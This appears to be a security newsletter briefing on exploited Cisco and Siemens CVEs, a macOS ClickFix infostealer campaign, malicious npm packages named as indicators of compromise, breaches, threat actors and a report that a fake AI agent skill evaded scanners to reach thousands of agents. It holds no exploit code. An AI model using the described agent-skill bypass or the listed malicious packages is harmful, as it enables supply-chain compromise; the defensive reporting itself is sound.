🚨 Critical Alerts
Cisco Unified CM flaw CVE-2026-20230 now exploited in attacks
Source: BleepingComputer
A high-severity SSRF vulnerability, CVE-2026-20230, in Cisco Unified Communications Manager Server is now actively being exploited in attacks, posing a significant and immediate threat.
New macOS ClickFix attack silently mounts DMGs to push infostealer
Source: BleepingComputer
A novel macOS attack campaign, 'ClickFix,' is using Terminal commands to surreptitiously download, mount, and launch info-stealing malware from malicious disk image (DMG) files.
Malicious npm Packages Pose as PostCSS Tools to Deliver Windows RAT
Source: The Hacker News
Cybersecurity researchers have uncovered a set of malicious npm packages, including 'aes-decode-runner-pro,' 'postcss-minify-selector,' and 'postcss-minify-selector-parser,' designed to deliver a Windows-based Remote Access Trojan (RAT) through a supply chain attack.
🔓 Breaches & Attacks
Tata Electronics confirms cyberattack as hackers leak data
Source: BleepingComputer
Tata Electronics has confirmed a cyberattack impacted parts of its IT infrastructure, leading to data leakage by the attackers.
Healthtech firm Xolis suffers data breach impacting 1.4 million people
Source: BleepingComputer
Healthcare technology company Xsolis reported a data breach affecting nearly 1.4 million individuals after a phishing attack granted unauthorized network access to attackers.
JaredFromSubway MEV bot hacked in $15 million crypto theft
Source: BleepingComputer
The JaredFromSubway Ethereum MEV bot experienced a $15 million loss after an attacker manipulated its opportunity-detection logic with fake cryptocurrency trading opportunities.
🛡️ Vulnerabilities & Patches
CVE-2025-15467 (CVSS: 9.8 CRITICAL)
A stack-based buffer overflow vulnerability in Siemens products using OpenSSL allows a remote attacker to cause a denial of service or potentially remote code execution by parsing a maliciously crafted CMS AuthEnvelopedData message with oversized AEAD parameters.
Remediation: Update affected Siemens products to the latest versions. Do not accept files from untrusted and unvalidated sources in affected applications. For specific products, vendor fixes are available (e.g., Update to V1.8.0 for Connector for Azure, V17 Update 9 for SIMATIC HMI panels, V3.3.2 for Databus, etc.). General recommendations include minimizing network exposure, using firewalls, and securing connected email servers.
CVE-2026-20230
A high-severity Server-Side Request Forgery (SSRF) vulnerability in Cisco Unified Communications Manager (CM) Server is currently being exploited in active attacks.
Remediation: Apply all available security patches from Cisco for Unified Communications Manager Server immediately to mitigate active exploitation.
CVE-2026-46746, CVE-2026-46748 (CVSS: 8.8 HIGH)
Multiple vulnerabilities in Siemens SINEC INS, including an OS Command Injection (CVE-2026-46746) allowing authenticated remote attackers to execute arbitrary commands via crafted directory names, and an Improper Privilege Management (CVE-2026-46748) enabling local privilege escalation to root due to a binary configured with 'cap_dac_override' capability.
Remediation: Update Siemens SINEC INS to V1.0 SP2 Update 6 or later. Additionally, minimize network exposure, locate control system networks behind firewalls, and use secure methods like VPNs for remote access.
🥷 Threat Actor Spotlight
Scattered Spider
Targets: Various organizations, including Transport for London.
Tactics: Cybercrime group engaged in hacking IT systems, with members recently pleading guilty to hacking Transport for London.
The Gentlemen RaaS
Targets: Organizations with Endpoint Detection and Response (EDR) solutions.
Tactics: Ransomware-as-a-service operation actively developing and utilizing 'GentleKiller' EDR frameworks to disable up to 400 security processes before deploying ransomware.
AryStinger
Targets: Legacy home routers (over 4,300 infected devices observed).
Tactics: A new malware family infecting legacy home routers to establish a distributed reconnaissance and proxy network, focusing on intelligence gathering prior to direct attacks.
🔬 Indicators of Compromise (IoCs)
npm package name:
aes-decode-runner-pro(Malicious package delivering Windows RAT)npm package name:
postcss-minify-selector(Malicious package delivering Windows RAT)npm package name:
postcss-minify-selector-parser(Malicious package delivering Windows RAT)
📋 Compliance & Deadlines
Federal Post-Quantum Cryptography Migration (Executive Order)
Deadline: December 31, 2030 (key establishment), December 31, 2031 (digital signatures)
Summary: President Trump's executive order mandates federal agencies migrate high-value assets and high-impact systems to post-quantum cryptography by set deadlines to counter future quantum computing threats.
CISA Known Exploited Vulnerabilities (KEV) Catalog / BOD 26-04
Deadline: Ongoing (rapid remediation required)
Summary: CISA has added four new vulnerabilities (CVE-2025-67038, CVE-2026-34908, CVE-2026-34909, CVE-2026-34910) to its KEV Catalog, requiring Federal Civilian Executive Branch agencies to prioritize rapid remediation. All organizations are encouraged to adopt risk-based vulnerability management for these actively exploited flaws.
Android Developer Verification (Google)
Deadline: September 30, 2026
Summary: Google will begin enforcing Android developer verification in Brazil, Indonesia, Singapore, and Thailand, blocking normal installations of apps from unregistered developers on certified Android phones.
📰 Industry News
OpenAI Expands Daybreak With GPT-5.5-Cyber to Help Defenders Patch Security Flaws
OpenAI has released an enhanced GPT-5.5-Cyber model as part of its Daybreak initiative, aimed at assisting trusted defenders in identifying and patching software vulnerabilities through deeper analysis of large codebases.
Fake AI Agent Skill Passed Security Scans and Reportedly Reached 26,000 Agents
A security firm successfully demonstrated that a fake AI agent skill could bypass all security scanners, reaching approximately 26,000 agents (some on corporate accounts), highlighting critical blind spots in AI agent security and access control.
Canada’s Spy Agency Used First-of-Its-Kind Warrant to Clean Botnet-Infected Devices
The Canadian Security Intelligence Service (CSIS) obtained an unprecedented Federal Court warrant to remotely access and neutralize foreign-run botnets infecting servers, home routers, and IoT devices within Canadian territory.
Stay secure. If you found this briefing useful, please subscribe to 0DayDaily and share.